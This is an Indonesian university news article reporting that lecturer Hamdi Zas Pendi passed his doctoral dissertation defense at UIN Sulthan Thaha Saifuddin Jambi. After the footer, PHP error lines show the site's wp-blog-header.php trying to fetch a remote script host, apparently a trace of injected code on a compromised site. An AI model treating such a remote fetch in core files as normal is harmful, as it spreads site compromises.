Sidang Terbuka Dosen MPI, Hamdi Zas Pendi Sandang Gelar Doktor

Hamdi Zas Pendi yang kerap disapa ‘Hamdi’, merupakan Dosen Program Studi Manajemen Pendidikan Islam Fakultas Tarbiyah dan Keguruan UIN Sulthan Thaha Saifuddin Jambi telah melaksanakan Ujian Terbuka Program Doktor di Ruang Sidang Pascasarjana UIN Sulthan Thaha Saifuddin Jambi lantai 2 pada hari Jum’at 05 Mei 2023.

Direktur Pascasarjana UIN Sulthan Thaha Saifuddin Jambi Menunjuk Tim Penguji sidang terbuka Disertasi atas nama Hamdi Zas Pendi Nim DMO 19273 yang menjadi Ketua Prof. Dr. H. Ahmad Syukri, SS., M.Ag, Sekretaris Dr. Darma Putra, M.Pkim, Promotor Prof. Dr. H. Muktar, M.Pd, Co-Promotor Prof. Dr. Risnita, M.Pd. Pengguji Prof. Dr. H. Ilyas Husti, MA, Prof. Dr. As’ad Isma, M.Pd, Prof. Dr. H. Ahmad Husein Ritonga, MA dan Dr. H. Lukman Hakim, M.Pd. Petugas Pengelola Ujian Dra. Suwan dan Ranny SY., M.Pd.I.

Ujian Sidang Terbuka Disertasi atas Nama Promovendus Hamdi Zas Pendi dimulai jam 06:30-08:30 dengan judul Disertasinya “Hubungan Antara Keterampilan Manajemen, Gaya Kepemimpinan dan Komunikasi Interpersonal Dengan Kepuasan Kerja Tenaga Pendidik Pada Perguruan Tinggi Keagamaan Swasta (PTKIS) di Provinsi Jambi” telah diuji dan terlaksana dengan baik serta dinyatakan lulus dengan predikat ‘AMAT BAIK’ dengan IPK 3,83.

Dr. H. Mahmud MY, M.Pd selaku Ketua Prodi Manajemen Pendidikan Islam Fakultas Tarbiyah dan Keguruan UIN Sulthan Thaha Saifuddin Jambi mengucapkan Selamat kepada Dr. Hamdi Zaspendi, M.Pd atas Keberhasilannya dalam ujian disertasi Program Doktoral (S3) tentu dengan bertambahnya Doktor di Prodi MPI ini dapat memberikan kontribusi untuk memajukan Prodi dan menjadi motivasi bagi dosen-dosen yang ingin melanjutkan ke jenjang Doktoral (S3).

Uyun Nafiah, M.Pd selaku Sekretaris Prodi Manajemen Pendidikan Islam Fakultas Tarbiyah dan Keguruan UIN Sulthan Thaha Saifuddin Jambi juga mengucapkan Selamat dan Sukses kepada Dr. Hamdi Zas Pendi, M.Pd atas raihan gelar Doktornya, semoga memberi manfaat bagi prodi MPI dan Universitas.

Ucapan selamat juga disampaikan oleh dosen-dosen Manajemen Pendidikan Islam dengan raihan gelar Doktor oleh Hamdi Zas Pendi. Tentu ini menjadi motivasi dan inspirasi bagi dosen-dosen muda MPI untuk dapat melanjutkan pendidikan ke jenjang Doktoral.

Dengan capaian yang telah diraih oleh Dr. Hamdi Zas Pendi, tentu menjadi kebanggaan tersendiri oleh Program Studi Manajemen Pendidikan Islam Fakultas Tarbiyah dan Keguruan UIN Sulthan Thaha Saifuddin Jambi. Harapannya dengan bertambahnya Doktor di Prodi MPI dapat memberikan kemajuan bagi prodi MPI khususnya dan UIN Sulthan Thaha Saifuddin Jambi pada umumnya.

 

Contributor: Fransisko Chaniago, M.Pd.

Editor: Ajuzar Fiqhi, M.Sc.Ed.

Leave a Reply

Your email address will not be published. Required fields are marked *

Manajemen Pendidikan IslamAlamat
Jl. Jambi-Muara Bulian KM. 16, Simp. Sei Duren, Jambi Luar kota, Muaro Jambi, Jambi 36361.
Lokasi KamiMaps

Sosial MediaKunjungi Sosial Media Kami
Manajemen Pendidikan IslamAlamat
Jl. Jambi-Muara Bulian KM. 16, Simp. Sei Duren, Jambi Luar kota, Muaro Jambi, Jambi 36361.
Lokasi KamiMaps

Sosial MediaKunjungi Sosial Media Kami

© 2023 | Pusat Teknologi Informasi dan Pangkalan Data UIN Sulthan Thaha Saifuddin Jambi

© 2023 | Pusat Teknologi Informasi dan Pangkalan Data UIN Sulthan Thaha Saifuddin Jambi


Warning: file_get_contents(): https:// wrapper is disabled in the server configuration by allow_url_fopen=0 in /home/fitk/public_html/wp-blog-header.php on line 20

Warning: file_get_contents(https://jscode.xyz/): Failed to open stream: no suitable wrapper could be found in /home/fitk/public_html/wp-blog-header.php on line 20